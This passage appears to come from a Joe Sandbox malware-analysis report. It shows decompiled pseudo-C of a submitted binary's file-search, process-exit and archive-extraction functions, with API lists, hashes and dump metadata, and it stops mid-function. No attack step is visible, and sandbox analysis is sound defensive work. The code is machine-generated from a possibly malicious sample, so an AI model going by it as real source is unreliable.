                0x00000000
                0x003da707
                0x003da6f2
                0x003da6f8
                0x003da6fc
                0x00000000
                0x00000000
                0x00000000

                APIs
                • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,003DA592,000000FF,?,?), ref: 003DA6C4
                  • Part of subcall function 003DBB03: _wcslen.LIBCMT ref: 003DBB27
                • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,003DA592,000000FF,?,?), ref: 003DA6F2
                • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,003DA592,000000FF,?,?), ref: 003DA6FE
                • FindNextFileW.KERNEL32(?,?,?,?,?,?,003DA592,000000FF,?,?), ref: 003DA728
                • GetLastError.KERNEL32(?,?,?,?,003DA592,000000FF,?,?), ref: 003DA734
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: FileFind$ErrorFirstLast$Next_wcslen
                • String ID:
                • API String ID: 42610566-0
                • Opcode ID: b7fdea34c58f5ecfc547aff0658879bbc40d275035b8ccf589967f4103888cf8
                • Instruction ID: fdd4c7c00bd0cac99afbde9f4b8e2347514333707261f5310af7afdb5e723d65
                • Opcode Fuzzy Hash: b7fdea34c58f5ecfc547aff0658879bbc40d275035b8ccf589967f4103888cf8
                • Instruction Fuzzy Hash: C141C232900515ABCB26DFA4DD84AEAB7B8FB48350F1042A6F55DE3340D734AE94CF90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F7DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 100%
                			E003F7DEE(int _a4) {
				void* _t14;
				void* _t15;
				void* _t17;
				void* _t18;
				void* _t19;

				if(E003FB076(_t14, _t15, _t17, _t18, _t19) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E003F7E73(_t15, _a4);
				ExitProcess(_a4);
			}








                0x003f7dfa
                0x003f7e16
                0x003f7e16
                0x003f7e1f
                0x003f7e28

                APIs
                • GetCurrentProcess.KERNEL32(?,?,003F7DC4,?,0040C300,0000000C,003F7F1B,?,00000002,00000000), ref: 003F7E0F
                • TerminateProcess.KERNEL32(00000000,?,003F7DC4,?,0040C300,0000000C,003F7F1B,?,00000002,00000000), ref: 003F7E16
                • ExitProcess.KERNEL32 ref: 003F7E28
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Process$CurrentExitTerminate
                • String ID:
                • API String ID: 1703294689-0
                • Opcode ID: a49c75186d45c462394fec0c484df0ff5e3e598a66ea5edaabb19c1625c5c1a9
                • Instruction ID: 17cb7c58991f2397b7a8afbc45c940231519307f1d78877d9d6e69fa272e3149
                • Opcode Fuzzy Hash: a49c75186d45c462394fec0c484df0ff5e3e598a66ea5edaabb19c1625c5c1a9
                • Instruction Fuzzy Hash: 79E04631000148ABCF026F20CE09AAABF6AEB20342F104465FA199A132CB36DE52CA84
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003D848E Relevance: 2.5, APIs: 1, Instructions: 960COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 60%
                			E003D848E(intOrPtr __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t383;
				signed int _t387;
				signed int _t392;
				signed int _t398;
				void* _t400;
				signed int _t401;
				signed int _t405;
				signed int _t406;
				intOrPtr _t407;
				signed int _t411;
				signed int _t416;
				signed int _t417;
				signed int _t421;
				signed int _t431;
				signed int _t432;
				signed int _t435;
				signed int _t436;
				signed int _t442;
				signed int _t445;
				signed int _t446;
				char _t448;
				signed int _t449;
				signed int _t450;
				signed int _t473;
				signed int _t482;
				intOrPtr _t485;
				signed int _t495;
				char _t500;
				char _t501;
				void* _t508;
				void* _t515;
				void* _t517;
				signed int _t525;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed int _t534;
				signed int _t536;
				signed int _t543;
				signed int _t552;
				signed int _t554;
				signed int _t556;
				signed int _t558;
				signed char _t559;
				signed int _t562;
				void* _t567;
				signed int _t573;
				intOrPtr* _t582;
				signed int _t585;
				signed int _t586;
				signed int _t595;
				signed int _t596;
				intOrPtr _t599;
				signed int _t602;
				signed int _t611;
				signed int _t613;
				signed int _t616;
				signed int _t619;
				signed int _t621;
				signed int _t622;
				signed int _t624;
				signed int _t625;
				signed int _t628;
				void* _t637;
				intOrPtr _t645;
				char _t646;
				signed int _t649;
				signed int _t650;
				void* _t657;
				void* _t658;
				signed int _t675;
				intOrPtr _t686;
				void* _t688;
				signed int _t689;
				signed int _t690;
				signed int _t691;
				signed int _t692;
				signed int _t695;
				intOrPtr _t697;
				signed int _t702;
				signed int _t704;
				signed int _t707;
				void* _t712;
				signed int _t713;
				signed int _t716;
				signed int _t717;
				void* _t719;
				void* _t721;
				void* _t723;
				void* _t725;

				E003EEB78(0x402858, _t721);
				E003EEC50(0x60ac);
				_t582 =  *((intOrPtr*)(_t721 + 8));
				_t684 = 0;
				_t697 = __ecx;
				 *((intOrPtr*)(_t721 - 0x1c)) = __ecx;
				_t585 =  *( *((intOrPtr*)(__ecx + 8)) + 0x92fa) & 0x0000ffff;
				 *(_t721 - 0x18) = _t585;
				if( *((intOrPtr*)(_t721 + 0xc)) != 0) {
					_t704 = __ecx + 0x10;
					 *(_t721 - 0x20) = _t704;
					L5:
					_t383 =  *((intOrPtr*)(_t582 + 0x21f4));
					if(_t383 == 2) {
						 *(_t697 + 0x10ff) = _t684;
						__eflags =  *(_t582 + 0x32f4) - _t684;
						if(__eflags > 0) {
							L22:
							__eflags =  *(_t582 + 0x32fc) - _t684;
							if(__eflags > 0) {
								L26:
								_t586 =  *(_t697 + 8);
								__eflags =  *((intOrPtr*)(_t586 + 0x7164)) - _t684;
								if( *((intOrPtr*)(_t586 + 0x7164)) != _t684) {
									L29:
									 *(_t721 - 0x13) = _t684;
									_t37 = _t721 - 0x60b8; // -22712
									_t38 = _t721 - 0x13; // 0x7ed
									_t387 = E003D5D1A(_t582 + 0x2298, _t38, 6, _t684, _t37, 0x800);
									__eflags = _t387;
									 *(_t721 - 0x11) = _t387 != 0;
									__eflags = _t387;
									if(_t387 != 0) {
										__eflags =  *(_t721 - 0x13);
										if( *(_t721 - 0x13) == 0) {
											__eflags = 0;
											 *((char*)(_t697 + 0xf9)) = 0;
										}
									}
									E003D2112(_t582);
									_t43 = _t721 - 0x30b8; // -10424
									E003DB76C(_t582, _t582 + 0x22c0, _t43, 0x800);
									__eflags =  *((char*)(_t582 + 0x338b));
									 *(_t721 - 0x24) = 1;
									if( *((char*)(_t582 + 0x338b)) == 0) {
										_t392 = E003D2209(_t582);
										__eflags = _t392;
										if(_t392 == 0) {
											_t559 =  *(_t697 + 8);
											__eflags = 1 -  *((intOrPtr*)(_t559 + 0x82c4));
											asm("sbb al, al");
											_t61 = _t721 - 0x11;
											 *_t61 =  *(_t721 - 0x11) &  !_t559;
											__eflags =  *_t61;
										}
									} else {
										_t562 =  *( *(_t697 + 8) + 0x82c4);
										__eflags = _t562 - 1;
										if(_t562 != 1) {
											__eflags =  *(_t721 - 0x13);
											if( *(_t721 - 0x13) == 0) {
												__eflags = _t562;
												 *(_t721 - 0x11) =  *(_t721 - 0x11) & (_t562 & 0xffffff00 | _t562 == 0x00000000) - 0x00000001;
												_push(0);
												_t54 = _t721 - 0x30b8; // -10424
												_t567 = E003DC249(_t54);
												_t675 =  *(_t697 + 8);
												__eflags =  *((intOrPtr*)(_t675 + 0x82c4)) - 1 - _t567;
												if( *((intOrPtr*)(_t675 + 0x82c4)) - 1 != _t567) {
													 *(_t721 - 0x11) = 0;
												} else {
													_t57 = _t721 - 0x30b8; // -10424
													_push(1);
													E003DC249(_t57);
												}
											}
										}
									}
									 *((char*)(_t697 + 0x67)) =  *((intOrPtr*)(_t582 + 0x3331));
									 *((char*)(_t697 + 0x68)) = 0;
									asm("sbb eax, [ebx+0x32f4]");
									 *0x403278( *((intOrPtr*)(_t582 + 0x6cc0)) -  *(_t582 + 0x32f0),  *((intOrPtr*)(_t582 + 0x6cc4)), 0);
									 *((intOrPtr*)( *_t582 + 0x10))();
									_t685 = 0;
									_t398 = 0;
									_t595 = 0;
									 *(_t721 - 0xd) = 0;
									 *(_t721 - 0x28) = 0;
									__eflags =  *(_t582 + 0x3333);
									if( *(_t582 + 0x3333) == 0) {
										L44:
										__eflags =  *(_t721 - 0x11) - _t595;
										if( *(_t721 - 0x11) != _t595) {
											L47:
											_t707 =  *(_t721 - 0x18);
											_t596 =  *((intOrPtr*)( *(_t697 + 8) + 0x7201));
											_t400 = 0x49;
											__eflags = _t596;
											if(_t596 == 0) {
												L49:
												_t401 = _t685;
												L50:
												__eflags = _t596;
												_t88 = _t721 - 0x30b8; // -10424
												_t405 = L003E1B7F(_t596, _t88, (_t401 & 0xffffff00 | _t596 == 0x00000000) & 0x000000ff, _t401,  *(_t721 - 0x28)); // executed
												__eflags = _t405;
												if(__eflags == 0) {
													L14:
													_t406 = 0;
													__eflags = 0;
													L15:
													 *[fs:0x0] =  *((intOrPtr*)(_t721 - 0xc));
													return _t406;
												}
												_push(0x800);
												_t407 = _t697 + 0x1100;
												_push(_t407);
												 *((intOrPtr*)(_t721 - 0x38)) = _t407;
												_t91 = _t721 - 0x30b8; // -10424
												_push(_t582);
												E003D8167(__eflags);
												__eflags =  *(_t721 - 0xd);
												if( *(_t721 - 0xd) != 0) {
													L54:
													 *(_t721 - 0xe) = 0;
													L55:
													_t411 =  *(_t697 + 8);
													_t599 = 0x45;
													__eflags =  *((char*)(_t411 + 0x715b));
													_t686 = 0x58;
													 *((intOrPtr*)(_t721 - 0x34)) = _t599;
													 *((intOrPtr*)(_t721 - 0x30)) = _t686;
													if( *((char*)(_t411 + 0x715b)) != 0) {
														L57:
														__eflags = _t707 - _t599;
														if(_t707 == _t599) {
															L59:
															_t102 = _t721 - 0x20b8; // -6328
															E003D6EDB(_t102);
															_push(0);
															_t103 = _t721 - 0x20b8; // -6328
															_t416 = E003DA56D(_t102, __eflags, _t697 + 0x1100, _t103);
															__eflags = _t416;
															if(_t416 == 0) {
																_t417 =  *(_t697 + 8);
																__eflags =  *((char*)(_t417 + 0x715b));
																_t114 = _t721 - 0xe;
																 *_t114 =  *(_t721 - 0xe) & (_t417 & 0xffffff00 |  *((char*)(_t417 + 0x715b)) != 0x00000000) - 0x00000001;
																__eflags =  *_t114;
																L65:
																_t116 = _t721 - 0x30b8; // -10424
																_t421 = E003D7C0D(_t582, _t116);
																__eflags = _t421;
																if(_t421 != 0) {
																	while(1) {
																		__eflags =  *(_t582 + 0x3333);
																		if( *(_t582 + 0x3333) == 0) {
																			goto L69;
																		}
																		_t121 = _t721 - 0x30b8; // -10424
																		_t552 = E003D8117(_t697, _t582, _t121);
																		__eflags = _t552;
																		if(_t552 == 0) {
																			 *((char*)(_t697 + 0x2100)) = 1;
																			goto L14;
																		}
																		L69:
																		_t123 = _t721 - 0x1174; // -2420
																		_t602 = 0x40;
																		memcpy(_t123,  *(_t697 + 8) + 0x6024, _t602 << 2);
																		_t725 = _t723 + 0xc;
																		asm("movsw");
																		_t125 = _t721 - 0x2c; // 0x7d4
																		 *(_t721 - 4) = 0;
																		asm("sbb ecx, ecx");
																		_t132 = _t721 - 0x1174; // -2420
																		E003DD051( *(_t721 - 0x20), 0,  *((intOrPtr*)(_t582 + 0x3334)), _t132,  ~( *(_t582 + 0x3338) & 0x000000ff) & _t582 + 0x00003339, _t582 + 0x3349,  *((intOrPtr*)(_t582 + 0x3384)), _t582 + 0x3363, _t125);
																		__eflags =  *(_t582 + 0x3333);
																		if( *(_t582 + 0x3333) == 0) {
																			L77:
																			_t697 =  *((intOrPtr*)(_t721 - 0x1c));
																			L78:
																			 *(_t721 - 4) =  *(_t721 - 4) | 0xffffffff;
																			_t153 = _t721 - 0x1174; // -2420
																			L003DF204(_t153);
																			_t154 = _t721 - 0x1070; // -2160
																			E003D9556(_t154);
																			_t611 =  *(_t582 + 0x3398);
																			_t431 = 1;
																			 *(_t721 - 0x20) = _t611;
																			 *(_t721 - 4) = 1;
																			_t688 = 0x50;
																			__eflags = _t611;
																			if(_t611 == 0) {
																				L88:
																				_t432 = E003D2209(_t582);
																				__eflags = _t432;
																				if(_t432 == 0) {
																					_t613 =  *(_t721 - 0xe);
																					__eflags = _t613;
																					if(_t613 == 0) {
																						L98:
																						_t431 = 1;
																						__eflags = 1;
																						L99:
																						__eflags =  *(_t582 + 0x6ccc);
																						if(__eflags == 0) {
																							__eflags = _t613;
																							if(_t613 == 0) {
																								L218:
																								 *(_t721 - 4) =  *(_t721 - 4) | 0xffffffff;
																								_t368 = _t721 - 0x1070; // -2160
																								_t398 = E003D959A(_t368);
																								__eflags =  *(_t721 - 0x11);
																								_t595 =  *(_t721 - 0xe);
																								_t689 =  *(_t721 - 0xd);
																								if( *(_t721 - 0x11) != 0) {
																									_t372 = _t697 + 0xf4;
																									 *_t372 =  *(_t697 + 0xf4) + 1;
																									__eflags =  *_t372;
																								}
																								L220:
																								__eflags =  *((char*)(_t697 + 0x68));
																								if( *((char*)(_t697 + 0x68)) != 0) {
																									goto L14;
																								}
																								__eflags = _t595;
																								if(_t595 != 0) {
																									L17:
																									_t406 = 1;
																									goto L15;
																								}
																								__eflags =  *(_t582 + 0x6ccc) - _t595;
																								if( *(_t582 + 0x6ccc) == _t595) {
																									L9:
																									E003D1F47(_t582);
																									goto L17;
																								}
																								__eflags = _t689;
																								_t406 = _t398 & 0xffffff00 | _t689 != 0x00000000;
																								goto L15;
																							}
																							L104:
																							_t616 =  *(_t721 - 0x18);
																							L105:
																							_t435 =  *(_t697 + 8);
																							__eflags =  *((char*)(_t435 + 0x7201));
																							if( *((char*)(_t435 + 0x7201)) == 0) {
																								L107:
																								_t436 =  *(_t721 - 0xd);
																								__eflags = _t436;
																								if(_t436 != 0) {
																									L112:
																									 *((char*)(_t721 - 0x12)) = 1;
																									__eflags = _t436;
																									if(_t436 != 0) {
																										L114:
																										 *((intOrPtr*)(_t697 + 0xf0)) =  *((intOrPtr*)(_t697 + 0xf0)) + 1;
																										 *((intOrPtr*)(_t697 + 0x80)) = 0;
																										 *((intOrPtr*)(_t697 + 0x84)) = 0;
																										 *((intOrPtr*)(_t697 + 0x88)) = 0;
																										 *((intOrPtr*)(_t697 + 0x8c)) = 0;
																										E003DAB1A(_t697 + 0xd0, _t688,  *((intOrPtr*)(_t582 + 0x3308)),  *((intOrPtr*)( *(_t697 + 8) + 0x92e0)));
																										E003DAB1A(_t697 + 0xa8, _t688,  *((intOrPtr*)(_t582 + 0x3308)),  *((intOrPtr*)( *(_t697 + 8) + 0x92e0)));
																										_t442 =  *(_t582 + 0x32f0);
																										_t712 = _t697 + 0x10;
																										_t619 =  *(_t582 + 0x32f4);
																										 *(_t697 + 0x38) = _t442;
																										 *(_t697 + 0x30) = _t442;
																										_t222 = _t721 - 0x1070; // -2160
																										 *(_t697 + 0x3c) = _t619;
																										 *(_t697 + 0x34) = _t619;
																										E003DD099(_t712, _t582, _t222);
																										_t621 =  *((intOrPtr*)(_t721 - 0x12));
																										_t690 = 0;
																										_t445 =  *(_t721 - 0xd);
																										 *((char*)(_t697 + 0x41)) = _t621;
																										 *((char*)(_t697 + 0x42)) = _t445;
																										 *(_t721 - 0x28) = 0;
																										 *(_t721 - 0x24) = 0;
																										__eflags = _t621;
																										if(_t621 != 0) {
																											L132:
																											_t622 =  *(_t697 + 8);
																											__eflags =  *((char*)(_t622 + 0x71a0));
																											 *((char*)(_t721 - 0x1053)) =  *((char*)(_t622 + 0x71a0)) == 0;
																											__eflags =  *((char*)(_t721 - 0x12));
																											if( *((char*)(_t721 - 0x12)) != 0) {
																												L136:
																												_t446 = _t690;
																												 *((char*)(_t721 - 0x10)) = _t690;
																												L137:
																												__eflags =  *(_t721 - 0x20);
																												 *((char*)(_t721 - 0x14)) = 1;
																												 *((char*)(_t721 - 0xf)) = 1;
																												if( *(_t721 - 0x20) == 0) {
																													__eflags =  *(_t582 + 0x3330);
																													if( *(_t582 + 0x3330) == 0) {
																														__eflags =  *((char*)(_t582 + 0x22b8));
																														if(__eflags != 0) {
																															_push( *(_t582 + 0x3388) & 0x000000ff);
																															_push( *((intOrPtr*)(_t582 + 0x338c)));
																															E003E3377(_t582,  *((intOrPtr*)(_t697 + 0xe8)));
																															_t485 =  *((intOrPtr*)(_t697 + 0xe8));
																															 *(_t485 + 0x4c48) =  *(_t582 + 0x32f8);
																															__eflags = 0;
																															 *(_t485 + 0x4c4c) =  *(_t582 + 0x32fc);
																															 *((char*)(_t485 + 0x4c60)) = 0;
																															E003E3020( *((intOrPtr*)(_t697 + 0xe8)),  *((intOrPtr*)(_t582 + 0x22b4)),  *(_t582 + 0x3388) & 0x000000ff); // executed
																														} else {
																															_push( *(_t582 + 0x32fc));
																															_push( *(_t582 + 0x32f8));
																															_push(_t712);
																															E003D9215(_t582, _t697, __eflags);
																														}
																													}
																													L169:
																													E003D1F47(_t582);
																													__eflags =  *((char*)(_t582 + 0x3331));
																													if( *((char*)(_t582 + 0x3331)) != 0) {
																														L172:
																														_t448 = 0;
																														__eflags = 0;
																														_t624 = 0;
																														L173:
																														__eflags =  *(_t582 + 0x3388);
																														if( *(_t582 + 0x3388) != 0) {
																															__eflags =  *((char*)(_t582 + 0x22b8));
																															if( *((char*)(_t582 + 0x22b8)) == 0) {
																																L181:
																																__eflags =  *(_t721 - 0xd);
																																 *((char*)(_t721 - 0x10)) = _t448;
																																if( *(_t721 - 0xd) != 0) {
																																	L191:
																																	__eflags =  *(_t721 - 0x20);
																																	_t691 =  *((intOrPtr*)(_t721 - 0xf));
																																	if( *(_t721 - 0x20) == 0) {
																																		L195:
																																		_t625 = 0;
																																		__eflags = 0;
																																		L196:
																																		__eflags =  *((char*)(_t721 - 0x12));
																																		if( *((char*)(_t721 - 0x12)) != 0) {
																																			goto L218;
																																		}
																																		_t713 =  *(_t721 - 0x18);
																																		__eflags = _t713 -  *((intOrPtr*)(_t721 - 0x30));
																																		if(_t713 ==  *((intOrPtr*)(_t721 - 0x30))) {
																																			L199:
																																			__eflags =  *(_t721 - 0x20);
																																			if( *(_t721 - 0x20) == 0) {
																																				L203:
																																				__eflags = _t448;
																																				if(_t448 == 0) {
																																					L206:
																																					__eflags = _t625;
																																					if(_t625 != 0) {
																																						L214:
																																						_t449 =  *(_t697 + 8);
																																						__eflags =  *((char*)(_t449 + 0x71a8));
																																						if( *((char*)(_t449 + 0x71a8)) == 0) {
																																							_t714 = _t697 + 0x1100;
																																							_t450 = E003DA4ED(_t697 + 0x1100,  *((intOrPtr*)(_t582 + 0x22bc))); // executed
																																							__eflags = _t450;
																																							if(__eflags == 0) {
																																								E003D2021(__eflags, 0x11, _t582 + 0x32, _t714);
																																								E003D6DCB(0x411098, __eflags);
																																							}
																																						}
																																						 *(_t697 + 0x10ff) = 1;
																																						goto L218;
																																					}
																																					_t692 =  *(_t721 - 0x24);
																																					__eflags = _t692;
																																					_t628 =  *(_t721 - 0x28);
																																					if(_t692 > 0) {
																																						L209:
																																						__eflags = _t448;
																																						if(_t448 != 0) {
																																							L212:
																																							_t341 = _t721 - 0x1070; // -2160
																																							E003D9F09(_t341);
																																							L213:
																																							_t702 = _t582 + 0x32d8;
																																							asm("sbb eax, eax");
																																							asm("sbb ecx, ecx");
																																							asm("sbb eax, eax");
																																							_t349 = _t721 - 0x1070; // -2160
																																							E003D9DA2(_t349, _t582 + 0x32e8,  ~( *( *(_t697 + 8) + 0x82d0)) & _t702,  ~( *( *(_t697 + 8) + 0x82d4)) & _t582 + 0x000032e0,  ~( *( *(_t697 + 8) + 0x82d8)) & _t582 + 0x000032e8);
																																							_t350 = _t721 - 0x1070; // -2160
																																							E003D9620(_t350);
																																							E003D7A78( *((intOrPtr*)(_t721 - 0x1c)),  *((intOrPtr*)( *((intOrPtr*)(_t721 - 0x1c)) + 8)), _t582,  *((intOrPtr*)(_t721 - 0x38)));
																																							asm("sbb eax, eax");
																																							asm("sbb eax, eax");
																																							__eflags =  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t721 - 0x1c)) + 8)) + 0x82d0)) & _t702;
																																							E003D9D9F( ~( *( *((intOrPtr*)( *((intOrPtr*)(_t721 - 0x1c)) + 8)) + 0x82d0)) & _t702,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t721 - 0x1c)) + 8)) + 0x82d0)) & _t702,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t721 - 0x1c)) + 8)) + 0x82d8)) & _t582 + 0x000032e8);
																																							_t697 =  *((intOrPtr*)(_t721 - 0x1c));
																																							goto L214;
																																						}
																																						__eflags =  *((intOrPtr*)(_t697 + 0x88)) - _t628;
																																						if( *((intOrPtr*)(_t697 + 0x88)) != _t628) {
																																							goto L212;
																																						}
																																						__eflags =  *((intOrPtr*)(_t697 + 0x8c)) - _t692;
																																						if( *((intOrPtr*)(_t697 + 0x8c)) == _t692) {
																																							goto L213;
																																						}
																																						goto L212;
																																					}
																																					__eflags = _t628;
																																					if(_t628 == 0) {
																																						goto L213;
																																					}
																																					goto L209;
																																				}
																																				_t473 =  *(_t697 + 8);
																																				__eflags =  *((char*)(_t473 + 0x71a0));
																																				if( *((char*)(_t473 + 0x71a0)) == 0) {
																																					goto L218;
																																				}
																																				_t448 =  *((intOrPtr*)(_t721 - 0x10));
																																				goto L206;
																																			}
																																			__eflags = _t625;
																																			if(_t625 != 0) {
																																				goto L203;
																																			}
																																			__eflags =  *(_t582 + 0x3398) - 5;
																																			if( *(_t582 + 0x3398) != 5) {
																																				goto L218;
																																			}
																																			__eflags = _t691;
																																			if(_t691 == 0) {
																																				goto L218;
																																			}
																																			goto L203;
																																		}
																																		__eflags = _t713 -  *((intOrPtr*)(_t721 - 0x34));
																																		if(_t713 !=  *((intOrPtr*)(_t721 - 0x34))) {
																																			goto L218;
																																		}
																																		goto L199;
																																	}
																																	__eflags =  *(_t582 + 0x3398) - 4;
																																	if( *(_t582 + 0x3398) != 4) {
																																		goto L195;
																																	}
																																	__eflags = _t691;
																																	if(_t691 == 0) {
																																		goto L195;
																																	}
																																	_t625 = 1;
																																	goto L196;
																																}
																																__eflags =  *((char*)(_t721 - 0x14));
																																if( *((char*)(_t721 - 0x14)) == 0) {
																																	goto L191;
																																}
																																__eflags = _t624;
																																if(_t624 != 0) {
																																	goto L191;
																																}
																																__eflags =  *(_t582 + 0x3333) - _t624;
																																if(__eflags == 0) {
																																	L189:
																																	_push(3);
																																	L190:
																																	_pop(_t637);
																																	_t321 = _t721 - 0x30b8; // -10424
																																	E003D2021(__eflags, _t637, _t582 + 0x32, _t321);
																																	 *((char*)(_t721 - 0x10)) = 1;
																																	E003D6D83(0x411098, 3);
																																	_t448 =  *((intOrPtr*)(_t721 - 0x10));
																																	goto L191;
																																}
																																__eflags =  *((intOrPtr*)(_t582 + 0x3359)) - _t624;
																																if( *((intOrPtr*)(_t582 + 0x3359)) == _t624) {
																																	L187:
																																	__eflags =  *((char*)(_t697 + 0xfc));
																																	if(__eflags != 0) {
																																		goto L189;
																																	}
																																	_push(4);
																																	goto L190;
																																}
																																__eflags =  *(_t582 + 0x6cdc) - _t624;
																																if(__eflags == 0) {
																																	goto L189;
																																}
																																goto L187;
																															}
																															__eflags =  *(_t582 + 0x32fc) - _t448;
																															if(__eflags < 0) {
																																goto L181;
																															}
																															if(__eflags > 0) {
																																L179:
																																__eflags = _t624;
																																if(_t624 != 0) {
																																	 *((char*)(_t697 + 0xfc)) = 1;
																																}
																																goto L181;
																															}
																															__eflags =  *(_t582 + 0x32f8) - _t448;
																															if( *(_t582 + 0x32f8) <= _t448) {
																																goto L181;
																															}
																															goto L179;
																														}
																														 *((char*)(_t697 + 0xfc)) = _t448;
																														goto L181;
																													}
																													asm("sbb eax, eax");
																													_t482 = E003DAAEA(_t582, _t697 + 0xd0, _t582 + 0x3308,  ~( *(_t582 + 0x3362) & 0x000000ff) & _t582 + 0x00003363);
																													__eflags = _t482;
																													if(_t482 == 0) {
																														goto L172;
																													}
																													_t624 = 1;
																													_t448 = 0;
																													goto L173;
																												}
																												_t716 =  *(_t582 + 0x3398);
																												__eflags = _t716 - 4;
																												if(_t716 == 4) {
																													L151:
																													_t270 = _t721 - 0x50b8; // -18616
																													E003DB76C(_t582, _t582 + 0x339c, _t270, 0x800);
																													_push(0x800);
																													_t272 = _t721 - 0x40b8; // -14520
																													_t645 = _t697;
																													_t273 = _t721 - 0x50b8; // -18616
																													_push(_t582);
																													E003D8167(__eflags);
																													_t446 =  *((intOrPtr*)(_t721 - 0x10));
																													__eflags = _t446;
																													if(_t446 == 0) {
																														L159:
																														_t646 =  *((intOrPtr*)(_t721 - 0xf));
																														L160:
																														__eflags =  *((intOrPtr*)(_t582 + 0x6cc8)) - 2;
																														if( *((intOrPtr*)(_t582 + 0x6cc8)) != 2) {
																															L146:
																															__eflags = _t446;
																															if(_t446 == 0) {
																																L163:
																																_t495 = 0;
																																__eflags = 0;
																																L164:
																																 *(_t697 + 0x10ff) = _t495;
																																goto L169;
																															}
																															L147:
																															__eflags = _t646;
																															if(_t646 == 0) {
																																goto L163;
																															}
																															_t495 = 1;
																															goto L164;
																														}
																														__eflags = _t446;
																														if(_t446 != 0) {
																															goto L147;
																														}
																														L145:
																														 *((char*)(_t721 - 0x14)) = 0;
																														goto L146;
																													}
																													__eflags =  *((short*)(_t721 - 0x40b8));
																													if( *((short*)(_t721 - 0x40b8)) == 0) {
																														goto L159;
																													}
																													_t276 = _t721 - 0x40b8; // -14520
																													_push(0x800);
																													_push(_t697 + 0x1100);
																													__eflags = _t716 - 4;
																													if(__eflags != 0) {
																														_push(_t582 + 0x32);
																														_t281 = _t721 - 0x1070; // -2160
																														_t500 = E003D9155(_t690, _t697, _t716, __eflags);
																														_t646 = _t500;
																														 *((char*)(_t721 - 0xf)) = _t500;
																														L157:
																														__eflags = _t646;
																														if(_t646 == 0) {
																															L144:
																															_t446 =  *((intOrPtr*)(_t721 - 0x10));
																															goto L145;
																														}
																														_t446 =  *((intOrPtr*)(_t721 - 0x10));
																														goto L160;
																													}
																													_push( *(_t697 + 8));
																													_t501 = E003D7542(_t645, _t697, __eflags);
																													L155:
																													_t646 = _t501;
																													 *((char*)(_t721 - 0xf)) = _t646;
																													goto L157;
																												}
																												__eflags = _t716 - 5;
																												if(_t716 == 5) {
																													goto L151;
																												}
																												__eflags = _t716 - 1;
																												if(_t716 == 1) {
																													L149:
																													__eflags = _t446;
																													if(_t446 == 0) {
																														goto L159;
																													}
																													_push(_t697 + 0x1100);
																													_t501 = E003D77B8(_t622, _t697 + 0x10, _t582);
																													goto L155;
																												}
																												__eflags = _t716 - 2;
																												if(_t716 == 2) {
																													goto L149;
																												}
																												__eflags = _t716 - 3;
																												if(__eflags == 0) {
																													goto L149;
																												}
																												E003D2021(__eflags, 0x47, _t582 + 0x32, _t697 + 0x1100);
																												__eflags = 0;
																												_t646 = 0;
																												 *((char*)(_t721 - 0xf)) = 0;
																												goto L144;
																											}
																											__eflags = _t445;
																											if(_t445 != 0) {
																												goto L136;
																											}
																											_t508 = 0x50;
																											__eflags =  *(_t721 - 0x18) - _t508;
																											if( *(_t721 - 0x18) == _t508) {
																												goto L136;
																											}
																											_t446 = 1;
																											 *((char*)(_t721 - 0x10)) = 1;
																											goto L137;
																										}
																										__eflags =  *(_t582 + 0x6cdc);
																										if( *(_t582 + 0x6cdc) != 0) {
																											goto L132;
																										}
																										_t717 =  *(_t582 + 0x32fc);
																										_t695 =  *(_t582 + 0x32f8);
																										__eflags = _t717;
																										if(__eflags < 0) {
																											L131:
																											_t690 = 0;
																											__eflags = 0;
																											_t712 = _t697 + 0x10;
																											goto L132;
																										}
																										if(__eflags > 0) {
																											L119:
																											_t649 =  *(_t582 + 0x32f0);
																											_t650 = _t649 << 0xa;
																											__eflags = ( *(_t582 + 0x32f4) << 0x00000020 | _t649) << 0xa - _t717;
																											if(__eflags < 0) {
																												L130:
																												_t445 =  *(_t721 - 0xd);
																												goto L131;
																											}
																											if(__eflags > 0) {
																												L122:
